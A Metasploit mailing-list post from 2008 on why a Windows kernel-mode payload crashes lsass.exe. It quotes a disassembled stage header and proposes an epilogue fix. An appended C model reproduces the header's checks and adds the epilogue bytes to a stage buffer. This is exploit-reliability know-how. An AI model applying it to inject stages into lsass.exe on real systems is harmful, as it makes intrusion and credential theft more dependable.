[framework] Mistake in kernel mode payloads
Giuseppe Gottardi
overet at securitydate.it
Tue Feb 26 18:27:24 CST 2008
Hi all,
I have a little trouble with Windows kernel-mode exploitation.
When a user-land payload is executed in the context of the lsass.exe
process, it forces lsass.exe to exit and the system shuts
down after 60 seconds due to an lsass.exe system error.
I think this happens because the payload doesn't terminate with:
61 popa
FF250803FE7F jmp near [0x7ffe0308]
In fact, the stage header code supplied by Metasploit is:
; Preserve the calling environment
0000003F 60 pusha
00000040 6A30 push byte +0x30
00000042 58 pop eax
00000043 99 cdq
00000044 648B18 mov ebx,[fs:eax]
; Check if Peb->Ldr is NULL
00000047 39530C cmp [ebx+0xc],edx
0000004A 7426 jz 0x72
; Extract Peb->ProcessParameters->ImagePathName.Buffer
0000004C 8B5B10 mov ebx,[ebx+0x10]
0000004F 8B5B3C mov ebx,[ebx+0x3c]
; Add 0x28 to the image path name (skip past c:\windows\system32\)
00000052 83C328 add ebx,byte +0x28
; Compare the name of the executable with lass
00000055 8B0B mov ecx,[ebx]
00000057 034B03 add ecx,[ebx+0x3]
0000005A 81F96C617373 cmp ecx,0x7373616c
; If it doesn't match, execute the original system call dispatcher
00000060 7510 jnz 0x72
00000062 648B18 mov ebx,[fs:eax]
00000065 43 inc ebx
00000066 43 inc ebx
00000067 43 inc ebx
; Check if Peb->SpareBool is 1, if it is, execute the original
; system call dispatcher
00000068 803B01 cmp byte [ebx],0x1
0000006B 7405 jz 0x72
; Set Peb->SpareBool to 1
0000006D C60301 mov byte [ebx],0x1
; Jump into the continuation stage
00000070 EB07 jmp short 0x79
; Restore the calling environment and execute the original system call
; dispatcher that was preserved in 0x7ffe0308
00000072 61 popa
00000073 FF250803FE7F jmp near [0x7ffe0308]
; continuation of the stage
When, on the first execution of the stage header, the flow is directed
to the stage (00000070), there is no way to restore the registers and
jump to 0x7ffe0308, so lsass.exe dies.
Doing some tests, I put:
61 popa
FF250803FE7F jmp near [0x7ffe0308]
as the "exit code" instructions, and the system kept running
without problems.
Do you have any suggestions on how to do this in Metasploit?
Regards,
oveRet
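As an added example (not part of the post above and not Metasploit's own code), the following C program models the three checks the stage header makes before it hands control to the stage, and appends the "popa ; jmp near [0x7ffe0308]" epilogue the poster uses as exit code. The PEB and process-parameters structures are constructed stand-ins that keep only the fields the shellcode touches (Ldr at PEB+0x0c, ProcessParameters at PEB+0x10, SpareBool at PEB+0x03, ImagePathName.Buffer at ProcessParameters+0x3c); their layout is an assumption made for the model, not a real PEB, and the sample image paths are constructed input.

```c
/*
 * Added example, not from the original post or from Metasploit: a portable
 * model of the stage-header checks in the disassembly above, plus the
 * popa / jmp [0x7ffe0308] epilogue.  The structs below are stand-ins that
 * keep only the fields the shellcode reads; the real PEB layout is not
 * reproduced (assumption made for the model).
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMAGE_PATH_SKIP 0x28          /* 20 UTF-16 chars: L"c:\\windows\\system32\\" */
#define LSASS_TAG       0x7373616cu   /* "lass" as a little-endian dword            */
#define PATH_BUF_BYTES  256           /* zeroed, so overlapping reads stay in bounds */

struct fake_process_parameters {
    uint8_t image_path[PATH_BUF_BYTES];   /* stands in for ImagePathName.Buffer */
};

struct fake_peb {
    uint8_t  spare_bool;                        /* PEB+0x03 in the shellcode      */
    void    *ldr;                               /* PEB+0x0c: NULL early in startup */
    struct fake_process_parameters *params;     /* PEB+0x10                        */
};

enum stage_action { RUN_ORIGINAL_DISPATCHER = 0, RUN_STAGE = 1 };

/* Encode ASCII as UTF-16LE into the zeroed buffer, as ImagePathName holds it. */
void set_image_path(struct fake_process_parameters *p, const char *ascii)
{
    memset(p->image_path, 0, sizeof p->image_path);
    for (size_t i = 0; ascii[i] && 2 * i + 1 < sizeof p->image_path; i++)
        p->image_path[2 * i] = (uint8_t)ascii[i];   /* high byte stays 0 */
}

/* mov ecx,[ebx] ; add ecx,[ebx+0x3]: two overlapping dwords of the UTF-16 name.
 * For L"lsass.exe" this sums 0x0073006c + 0x73006100 = 0x7373616c ("lass"). */
uint32_t name_tag(const uint8_t *name)
{
    uint32_t lo, hi;
    memcpy(&lo, name, 4);
    memcpy(&hi, name + 3, 4);
    return lo + hi;
}

/* The decision the stage header makes on every intercepted system call. */
enum stage_action stage_header(struct fake_peb *peb)
{
    if (peb->ldr == NULL)                          /* cmp [ebx+0xc],edx ; jz   */
        return RUN_ORIGINAL_DISPATCHER;

    const uint8_t *exe = peb->params->image_path + IMAGE_PATH_SKIP;
    if (name_tag(exe) != LSASS_TAG)                /* cmp ecx,0x7373616c ; jnz */
        return RUN_ORIGINAL_DISPATCHER;

    if (peb->spare_bool == 1)                      /* cmp byte [ebx],0x1 ; jz  */
        return RUN_ORIGINAL_DISPATCHER;

    peb->spare_bool = 1;                           /* mov byte [ebx],0x1       */
    return RUN_STAGE;                              /* jmp short 0x79           */
}

/* Bytes of "popa ; jmp near [0x7ffe0308]" exactly as listed in the post. */
static const uint8_t RETURN_TO_DISPATCHER[] = {
    0x61, 0xff, 0x25, 0x08, 0x03, 0xfe, 0x7f
};

/* Append the epilogue to a stage buffer of `len` bytes in a buffer of `cap`
 * bytes; returns the new length, or 0 if the epilogue does not fit. */
size_t append_return_to_dispatcher(uint8_t *stage, size_t len, size_t cap)
{
    if (len + sizeof RETURN_TO_DISPATCHER > cap)
        return 0;
    memcpy(stage + len, RETURN_TO_DISPATCHER, sizeof RETURN_TO_DISPATCHER);
    return len + sizeof RETURN_TO_DISPATCHER;
}

int main(void)
{
    struct fake_process_parameters pp;
    struct fake_peb peb = { 0, (void *)1, &pp };   /* Ldr non-NULL: process is up */

    set_image_path(&pp, "C:\\WINDOWS\\system32\\lsass.exe");
    printf("lsass, first call : %d\n", stage_header(&peb));   /* 1: run the stage   */
    printf("lsass, second call: %d\n", stage_header(&peb));   /* 0: SpareBool set   */

    peb.spare_bool = 0;
    set_image_path(&pp, "C:\\WINDOWS\\system32\\svchost.exe");
    printf("svchost           : %d\n", stage_header(&peb));   /* 0: name mismatch   */
    return 0;
}
```

Two things worth noting when wiring the epilogue into a real stage: the name check is a 4-byte sum over overlapping reads, so it only ever inspects the characters "l", "s", "a", "s" at even offsets and will also match any other image name with those four characters in those positions; and the popa only restores the right registers if the stage leaves ESP exactly where the stage header's pusha put the saved frame, so a stage that unbalances the stack before reaching the epilogue will still crash lsass.exe.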